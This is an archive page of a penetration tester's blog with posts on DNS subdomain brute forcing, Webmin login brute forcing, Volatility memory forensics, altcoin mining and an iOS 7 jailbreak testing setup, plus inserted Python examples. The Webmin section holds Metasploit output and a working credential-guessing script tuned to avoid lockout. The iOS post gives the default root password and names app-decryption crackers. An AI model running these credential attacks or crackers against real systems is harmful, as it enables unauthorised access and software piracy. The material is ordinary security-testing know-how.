carnal0wnage [Shared Reader]

Tuesday, March 25, 2014

DNS Brute String

Just sticking this here so I can find it later. Thanks @mubix.

cat hosts.txt | xargs -t -I subdomain dig +noall subdomain.THEDOMAIN.com +answer

Update: Rob pointed me to his post on it:

http://www.room362.com/blog/2014/01/29/hostname-bruteforcing-on-the-cheap/
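The xargs/dig one-liner above falls over on a zone with a wildcard record, where every guess "resolves". The script below is an added example, not code from the post or from Rob's write-up: it brute-forces a wordlist against a domain and first probes random labels so wildcard answers can be discarded. The resolver is a parameter; the FAKE_ZONE dictionary and fake_resolve are constructed stand-ins so the logic runs offline, and build_resolver() is the real socket-based version.

```python
"""Subdomain brute force with wildcard-DNS detection (added example)."""
import secrets
import socket


def build_resolver():
    """Real resolver: sorted list of IPv4 answers, or [] when the name does not exist."""
    def resolve(name):
        try:
            return sorted({info[4][0] for info in socket.getaddrinfo(name, None, socket.AF_INET)})
        except socket.gaierror:
            return []
    return resolve


def wildcard_addresses(domain, resolve, probes=3):
    """Resolve random labels that cannot be real hosts; any answer means a wildcard record."""
    found = set()
    for _ in range(probes):
        label = secrets.token_hex(8)  # 16 random hex chars, e.g. 3f9a...; not a real host
        found.update(resolve(f"{label}.{domain}"))
    return found


def brute_force(domain, words, resolve):
    """Return {fqdn: [ips]} for wordlist entries whose answers are not just the wildcard."""
    wildcard = wildcard_addresses(domain, resolve)
    hits = {}
    for word in words:
        word = word.strip()
        if not word or word.startswith("#"):   # skip blank lines and comments in hosts.txt
            continue
        fqdn = f"{word}.{domain}"
        ips = [ip for ip in resolve(fqdn) if ip not in wildcard]
        if ips:
            hits[fqdn] = ips
    return hits


# Constructed zone: three real hosts plus a wildcard that answers for anything else.
FAKE_ZONE = {
    "www.example.com": ["192.0.2.10"],
    "mail.example.com": ["192.0.2.20"],
    "dev.example.com": ["192.0.2.30", "198.51.100.1"],
}


def fake_resolve(name):
    """Offline stand-in for build_resolver()."""
    if name in FAKE_ZONE:
        return list(FAKE_ZONE[name])
    if name.endswith(".example.com"):
        return ["198.51.100.1"]   # the wildcard answer
    return []


if __name__ == "__main__":
    # With a real hosts.txt: words = open("hosts.txt").read().splitlines(); resolve = build_resolver()
    words = ["www", "mail", "dev", "vpn", "# comment", ""]
    for host, ips in brute_force("example.com", words, fake_resolve).items():
        print(host, ",".join(ips))
```

Against the constructed zone, "vpn" only returns the wildcard address and is dropped, while "dev" keeps its non-wildcard record; swap in build_resolver() and a real wordlist to run it for real.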

Wednesday, March 12, 2014

Webmin Brute Forcing

So I ran across a bunch of Webmin boxes on a pentest. I went to try http_login or some other spiffy Metasploit auxiliary module, but nothing was working quite right. I ended up needing to write my own because I had 60+ hosts to check, and that is just tedious enough to make you write code rather than do it manually.

At least one gotcha I discovered is that Webmin will block the source IP after four or five (usually 5) failed attempts. I believe the default block is 300 seconds, and it will also supposedly increase the delay if the same host keeps hitting it.

I took the approach of throwing 5 passwords at each host; if it's not something super obvious, I'd move along. Maybe not the best solution, but I wanted to make sure it wasn't root/root or webmin/webmin and move on.

msf auxiliary(webmin_login_brute) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf auxiliary(webmin_login_brute) > set RPORT 10000
RPORT => 10000
msf auxiliary(webmin_login_brute) > set SSL TRUE
SSL => TRUE
msf auxiliary(webmin_login_brute) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf auxiliary(webmin_login_brute) > set USER_AS_PASS false
USER_AS_PASS => false
msf auxiliary(webmin_login_brute) > set USERNAME root
USERNAME => root
msf auxiliary(webmin_login_brute) > set PASS_FILE /root/.msf4/data/wordlists/webmin_defaults.txt
PASS_FILE => /root/.msf4/data/wordlists/webmin_defaults.txt
msf auxiliary(webmin_login_brute) > run

[*] Verifying login exists at http://192.168.1.1:10000/session_login.cgi
[*] http://192.168.1.1:10000/session_login.cgi - Webmin - Attempting authentication
[*] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[-] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password'
[*] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] Scanned 1 of 1 hosts (100% complete)


and looks like this when it works

[*] Verifying login exists at http://10.0.0.25:12321/session_login.cgi
[*] http://10.0.0.25:12321/session_login.cgi - Webmin - Attempting authentication
[*] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 10.0.0.25:12321 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[+] http://10.0.0.25:12321/session_login.cgi - Webmin - Login Successful 302 with 'root':'password' Redirect to->https://10.0.0.25:12321/
[*] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'letmein'
[*] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

** Note: you have to unset the PASSWORD value too. For some reason it is being populated with a blank password and the module tries that first, which sucks when you only have five chances.

Code is here
https://github.com/carnal0wnage/metasploit-framework/blob/webminmodule/modules/auxiliary/scanner/http/webmin_login.rb

Figured I'd let the blog serve as a way to let people test it prior to my doing a pull request.
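The logic that matters in the module is small: send the form, read the status, and stop before the lockout kicks in. Below is an added example of that logic in plain Python, not the Metasploit module from the post. It assumes the /session_login.cgi form takes "user" and "pass" fields and wants a cookie present (the "testing=1" cookie is an assumption carried over from the Metasploit module's behaviour), that a 302 with a Location header means the login worked, and that a 403 means the source IP is now blocked. The HTTP transport is a parameter, so fake_webmin (a constructed stand-in) exercises the success, blocked and exhausted cases offline; http_post is the real transport.

```python
"""Webmin default-credential check that stays under the lockout threshold (added example)."""
import ssl
import urllib.error
import urllib.parse
import urllib.request

MAX_ATTEMPTS = 5   # the post saw blocks after 4-5 failures, so never go past 5 per host
SUCCESS, FAILED, BLOCKED = "success", "failed", "blocked"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface the 302 instead of following it."""
    def redirect_request(self, *args, **kwargs):
        return None


def http_post(url, data):
    """Real transport: returns (status, Location header). Webmin usually self-signs, so no cert check."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    opener = urllib.request.build_opener(_NoRedirect(), urllib.request.HTTPSHandler(context=ctx))
    req = urllib.request.Request(url, data=urllib.parse.urlencode(data).encode(),
                                 headers={"Cookie": "testing=1"})  # assumption: Webmin wants a cookie
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:          # 302/403/etc. arrive here because of _NoRedirect
        return err.code, err.headers.get("Location")


def classify(status, location):
    """Map one response to success / failed / blocked."""
    if status == 302 and location:
        return SUCCESS
    if status == 403:
        return BLOCKED
    return FAILED


def check_host(host, port, username, passwords, post=http_post, use_ssl=True):
    """Try at most MAX_ATTEMPTS passwords, stopping early on success or a 403 block.

    Returns (outcome, password_or_None, [(password, outcome), ...]).
    Passwords are exactly what the caller passes: no implicit blank password.
    """
    url = f"{'https' if use_ssl else 'http'}://{host}:{port}/session_login.cgi"
    tried = []
    for password in passwords[:MAX_ATTEMPTS]:
        status, location = post(url, {"user": username, "pass": password, "page": "/"})
        outcome = classify(status, location)
        tried.append((password, outcome))
        if outcome in (SUCCESS, BLOCKED):
            return outcome, password, tried
    return FAILED, None, tried


def fake_webmin(correct_password, block_after):
    """Constructed stand-in for a Webmin host: 302 on the right password, 403 once blocked."""
    state = {"calls": 0}

    def post(url, data):
        state["calls"] += 1
        if state["calls"] > block_after:
            return 403, None
        if data["pass"] == correct_password:
            return 302, url.rsplit("/", 1)[0] + "/"
        return 200, None
    return post


if __name__ == "__main__":
    defaults = ["root", "webmin", "password", "letmein", "password1", "admin"]
    print(check_host("10.0.0.25", 12321, "root", defaults, post=fake_webmin("password", 5)))
    print(check_host("192.168.1.1", 10000, "root", defaults, post=fake_webmin("nope", 4)))
```

Run it against real hosts by leaving post at its default; the list of six defaults is deliberately cut to five by MAX_ATTEMPTS so a second pass after the block timer expires is still possible.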

CG

Thursday, February 20, 2014

Finding malicious DLLs with Volatility

Colin and I were working on a memory image the other day and needed to find the DLLs loaded by svchost.exe. We turned to everyone's default memory analysis tool, Volatility. Volatility doesn't really give you a good option to search for loaded DLLs by process name. You can specify a PID to do this, but when you have many processes with the same name (e.g. svchost.exe) you end up with a nasty command like this to do the trick:




This really wasn't working for us, so we took a look at Volatility's source code and made some small adjustments. We modified the taskmods.py module, which is what the dlllist plugin builds on. Normally if you run the dlllist plugin with the -h option it gives you the options you can use, such as an offset or a PID, as seen below:

With our modified taskmods.py you get a new option for selecting a process by name, or a list of processes by name, as seen below:


Now we can simply give it the name svchost.exe and get a list of loaded DLLs for every process running under that name. If you have a non-standard svchost.exe process running, this will pick it up as well, but that situation might also help identify a compromise :)

So executing Volatility with the following command:

vol.py -f 7re-912d4ad7.vmem --profile Win7SP1x64 dlllist -n svchost.exe

now gives this output:




I am sure there are better ways of getting the same information, but this worked rather well for us and we thought we would share. You can get the module at our GitHub repository.

To install it just replace the taskmods.py from your $VOLATILITYHOME/volatility/plugins directory with our taskmods.py.

We have tested it on volatility 2.2, 2.3, 2.3.1 on XP and Windows 7 with no problems.
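For anyone who cannot swap out taskmods.py, the "nasty command" from the start of the post can be generated instead of typed. The script below is an added example, not the modified plugin from the post: it parses Volatility 2 pslist output (the PSLIST text is constructed here to match that column layout), collects the PIDs for one or more names the way the -n option does, and emits the equivalent dlllist -p invocation. The odd_parents check (svchost.exe should be a child of services.exe) is an added heuristic for the "non-standard svchost.exe" case the post mentions, not something the plugin does.

```python
"""PIDs by process name from Volatility 2 pslist output, plus the dlllist -p command (added example)."""
import re
import shlex

# Constructed pslist output in the Volatility 2 layout (Win7 x64 style columns).
PSLIST = """\
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start
------------------ -------------------- ------ ------ ------ -------- ------ ------ ----------
0xfffffa8000c8f040 System                    4      0     80      520 ------      0 2013-11-01 12:00:00 UTC+0000
0xfffffa80017f1b30 services.exe            480    396      8      213      0      0 2013-11-01 12:00:05 UTC+0000
0xfffffa8001873060 svchost.exe             592    480     10      352      0      0 2013-11-01 12:00:06 UTC+0000
0xfffffa80018a3b30 svchost.exe             656    480      7      287      0      0 2013-11-01 12:00:06 UTC+0000
0xfffffa8001a5e060 explorer.exe           1320   1284     28      744      1      0 2013-11-01 12:01:10 UTC+0000
0xfffffa8001c3d580 svchost.exe            2044   1320      3       60      1      0 2013-11-01 12:05:33 UTC+0000
"""

# offset, name, pid, ppid are the first four whitespace-separated columns of a process row
ROW = re.compile(r"^(0x[0-9a-f]+)\s+(\S+)\s+(\d+)\s+(\d+)\s+")


def parse_pslist(text):
    """Return [(offset, name, pid, ppid), ...]; header and rule lines do not match ROW."""
    procs = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            procs.append((m.group(1), m.group(2), int(m.group(3)), int(m.group(4))))
    return procs


def pids_by_name(procs, names):
    """Case-insensitive match on one or more process names (what -n does in the post)."""
    wanted = {n.lower() for n in names}
    return [pid for _, name, pid, _ in procs if name.lower() in wanted]


def dlllist_command(image, profile, pids):
    """The manual equivalent of 'dlllist -n svchost.exe': one -p carrying every matching PID."""
    return (f"vol.py -f {shlex.quote(image)} --profile {profile} "
            f"dlllist -p {','.join(str(p) for p in pids)}")


def odd_parents(procs, name="svchost.exe", expected_parent="services.exe"):
    """Added heuristic: processes called <name> whose parent is not <expected_parent>."""
    name_of = {pid: pname for _, pname, pid, _ in procs}
    return [pid for _, pname, pid, ppid in procs
            if pname.lower() == name and name_of.get(ppid, "").lower() != expected_parent]


if __name__ == "__main__":
    procs = parse_pslist(PSLIST)          # real use: parse_pslist(open("pslist.txt").read())
    pids = pids_by_name(procs, ["svchost.exe"])
    print(dlllist_command("7re-912d4ad7.vmem", "Win7SP1x64", pids))
    print("svchost.exe not parented by services.exe:", odd_parents(procs))
```

In the constructed sample, PID 2044 is an svchost.exe spawned by explorer.exe; the dlllist command still includes it (as the post notes, the name match picks up impostors too), and odd_parents flags it for a closer look.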





Thursday, January 2, 2014

Modern Day Gold Mining

Well, maybe not gold... but Litecoins, HoboNickels, Dogecoins, and other kinds of *coins*.

We've all heard about Bitcoin (BTC) and all wish we had bought a few hundred two years ago so we could retire today, but who knew...

Well, it's too late to get into the Bitcoin game because the mining difficulty is now super high, but thankfully 60+ alternative cryptocurrencies have sprung up, and thanks to sites like www.cryptsy.com you can now trade those alternate currencies for BTC.

Want to know what to mine? You can check out http://www.coinwarz.com/cryptocurrency or http://www.coinarmy.com/

Punch in the numbers for your SHA256/scrypt hashing rate and get an idea of what to mine to make the most $$$ the fastest. So if you can do 300 KH/s (an average cheap GPU):


in 166 days you can make one Bitcoin (BTC) by mining Netcoins and exchanging them at the current rate, whereas mining Bitcoin directly would take more like 2000 days.


OMG, it's raining money! Sort of.

Anyway, it's neat. Seems like a good reason to build a hash cracker, write it off as security equipment, and have it mining when it's not busy converting hashes into plaintext.


Couple articles on it:

http://motherboard.vice.com/blog/beyond-bitcoin-a-guide-to-the-most-promising-cryptocurrencies
http://www.zdnet.com/a-crypto-currency-primer-bitcoin-vs-litecoin-7000024301/
http://alunacrypto.blogspot.ca/2013/12/a-new-wave-of-2nd-generation.html

Solo Mining vs Pools
http://bitcoin.stackexchange.com/questions/11471/what-are-the-advantages-and-disadvantages-of-pooled-mining
http://www.devtome.com/doku.php?id=mining_pools_vs_solo_mining

Hardware comparison to get an idea what numbers to put into those crunchers.

https://litecoin.info/Mining_hardware_comparison

You can even buy a six-graphics-card motherboard for mining, stock trading, or making everyone (well, your geek homies) jealous.



happy cracking/mining

P.S.
From a hacker shit perspective... I can't imagine the mining pool software is very good. It's probably worth taking a look at it. :-)

Saturday, December 28, 2013

Creating a iOS7 Application Pentesting Environment




Now that you have your shiny new evasi0n7 jailbreak running, it's time to set up the environment for application testing!

(cross-posted with permission from CG from my work blog)

Getting in

Since Mobile Substrate is not working yet, we will focus on getting the iDevice up and running as a functioning *nix environment and installing some tools that don't require Substrate.


First we need to get a shell prompt on the iDevice. Open Cydia (installed by default with the jailbreak) and install the OpenSSH package.





Once OpenSSH is installed you can SSH into the device; find its IP address in the Settings > Wireless Networks > Advanced ">" menu.

Now SSH to port 22 on that IP using the username "root" and the password "alpine".

Once you have a shell you can use APT to install most of the other packages you need. Also change the default root password (passwd) to something else so people can't mess with your phone: every jailbroken device starts out with the same one, and you just put an SSH server on it.

Arming your iDevice with *nix tools


To have a functioning *nix environment we need to install a ton of utilities that aren't usually installed as part of the default jailbreak or the bash shell. This includes utilities like strings, grep, awk, find, etc.

Some of the utility packages do not say outright what's inside them; the BigBoss tools package (bigbosshackertools) and Erica Utilities (com.ericasadun.utilities) are two examples.

These two in particular install strings and other binutils-type tools, several of them patched or modded to work on the iOS (ARM) architecture.

Packages (some of these will be pre-installed with the JB):


adv-cmds
apr
apr-lib
apr-util
apt
apt7
apt7-key
apt7-lib
apt7-ssl
base
bash
basic-cmds
berkeleydb
bigbosshackertools
bootstrap-cmds
bzip2
class-dump
com.ericasadun.utilities
com.evad3rs.evasi0n7
com.innoying.sbutils
coreutils
coreutils-bin
curl
cy+cpu.arm
cy+kernel.darwin
cy+lib.corefoundation
cy+model.ipad
cy+os.ios
cydia
cydia-lproj
darwintools
debianutils
developer-cmds
diffutils
diskdev-cmds
dpkg
expat
file
file-cmds
findutils
firmware
firmware-sbin
gawk
gdb
gettext
git
gnupg
grep
gzip
inetutils
iokittools
ldid
less
libffi
libxml2
libxml2-lib
lsof
lzma
make
nano
ncurses
neon
network-cmds
odcctools
openssh
openssl
org.thebigboss.repo.icons
p7zip
pam
pam-modules
patch
pcre
profile.d
python
readline
rsync
sed
shell-cmds
sqlite3
sqlite3-lib
subversion
system-cmds
tar

tcpdump
top
uikittools
unrar
unzip
uuid
vim
wget
whois
xar
xml2
zip



Take this list, dump it to a file (packages.txt) and run:

apt-get install $(<packages.txt)



Extras


In addition to the utilities that make the iDevice a functioning *nix environment, there are several tools that aid in connecting to, controlling, reverse engineering, and monitoring iOS applications. Below is a list of those tools, a description, and their locations where known (some cut from my OWASP page):


Tool                 Link                                             Description
USBMuxd              http://cgit.sukimashita.com/usbmuxd.git/         Tunnel ports over USB (enables SSH without a network, via localhost:2222)
libimobiledevice     http://www.libimobiledevice.org/                 Library. Custom implementation of iTunes-type connections, file-system access, system access.
Filemon              (no link given)                                  Monitor the iOS file system in real time
FileDP               (no link given)                                  Audits the data protection class of files
BinaryCookieReader   (no link given)                                  Read cookies.binarycookies files
lsof ARM binary      (no link given)                                  List all open files and the processes that opened them
lsock ARM binary     (no link given)                                  Monitor socket connections
removePIE            (no link given)                                  Disables ASLR (PIE) for an application
Clutch               https://github.com/KJCracks/Clutch-dl/releases   Application cracker, compiled (removes the App Store encryption)
Rasticrac            https://twitter.com/iRastignac                   Application cracker (bash GDB wrapper)

Next steps


This is just the basics.

Once you have all of these utilities and tools installed, you're pretty much waiting on Substrate to work on iOS 7. After that's done you can install your favorite all-encompassing or homegrown tool that uses Substrate to do hooking, such as Cycript, iNalyzer, SSL Kill Switch, Snoop-it, IntroSpy, iAuditor, etc.

Then you just have to MitM the web traffic. There are plenty of guides on that around the net. 

If you have other tools you use in your app assessment setup we'd love to hear about it. Feel free to leave suggestions in the comments. 


Thursday, December 26, 2013

Where has CG been?

I've been here....work has kept me super busy...pretty sure there is a post in 2012 that says about the same. :-/

I attempted to recruit some smart people to make some posts and they did, so thanks to all the guest bloggers this year.

So what's been up?

Well, I've taken on two hobbies that don't directly tie into this blog. One, Christmas lights, like the obnoxious programmable RGB ones. Facebook friends have been kept abreast of the situation. Two, stock trading, which I found out a fair number of hackers are into, which is cool. The stock stuff came about from reading the Rich Dad Poor Dad book and trying to figure out a way not to have to work until I die. See that post for a tiny bit more explanation.

I've been told by a few people that readers would probably find the xmas light stuff interesting as it does involve cat-5 cables and packets over Ethernet frames. So I'll start knowledge dumping in Jan on that topic.

Anyway. Tech stuff... what's up?

Shitty passwords are what's up this year (totally new issue, right??!!!). I didn't go back and count, but a large majority of the tests I performed or assisted with this year where there was some sort of single-factor login portal (SSL VPN, Citrix, OWA, etc.) fell over to one of the following:


It's 2013, almost 2014, as I write this, and it's sad that we are still dealing with this as if it were a new or unsolvable problem. It just reaffirms to me that we are failing as an industry if today we can break into an organization that spends any dollars on security with Password1. It's really no mystery why bad guys are beating the piss out of people.

Earlier this year a guy who works on things in China gave a talk and summed up the Chinese cultural view of security like this (to paraphrase):

"if an organization doesn't protect against stealing it, they must not care about it"

Protecting your important **stuff** with Password1, or with a web application where any web vulnerability scanner finds SQL injection... yeah, it's no surprise when someone steals your *whatever*.

Grumpiness aside, we did do some neat shit this year. A pseudo highlight reel can be found in the string of talks that Chris Nickerson, Eric Smith, Mubix and I gave at DerbyCon this year.




Lares continues to break into hard to break into places using Red Teaming.


I also gave a talk at a credit union conference a few months ago where I tried to sum up how organizations are getting owned. TL;DR: it's all stuff we know about, but it takes work to fix, so not that many organizations do it.



I've been kind of a deadbeat on speaking in 2013, but I have a few ideas for talks in 2014; ideally blog posts, either here or on the Lares blog, will help me work those ideas into posts and eventually into a slide deck or two.


Monday, December 23, 2013

Best non-technical book I read this year

So first of a few end of year posts...

The best non-technical book I read this year was Rich Dad Poor Dad.


I'd like to thank Joe McCray for recommending it to me. I wish I had read the book in my teens and/or my twenties. There are TONS of reviews of the book; I'd encourage everyone remotely interested to read a mix of the 5-star and 1-star ones to get a feel. I'll even drop the most important thing I got from the book here:

Assets make you money, liabilities cost you money. To build wealth you need to accumulate assets.

Pretty simple, right?! Unfortunately most of us (myself included) have been brought up to look at things like houses, cars and expensive things as assets because we can sell them for $$ if we need to. However, as a former BMW owner and a current house owner, I can attest that neither of those items *made* me any money. In fact the house is a constant source of cash outflow. This is exactly what the book talks about.

Now, to be fair, and this will come across if you read the reviews, there is A LOT of magic hand-waving on how one starts buying assets instead of liabilities and growing wealth. The author uses real estate, and mentions starting a business or building wealth via stocks/trading as other ways to build wealth (assets). None of those, in my opinion, are quick, easy, or cheap to get started in, and none of them come without a hefty education requirement if you want to avoid losing your starting capital. Nevertheless, the value of the book comes from identifying how poor people view and interact with money versus how rich people do, and from giving a general road map for a new way to think about building wealth.

thoughts?

CG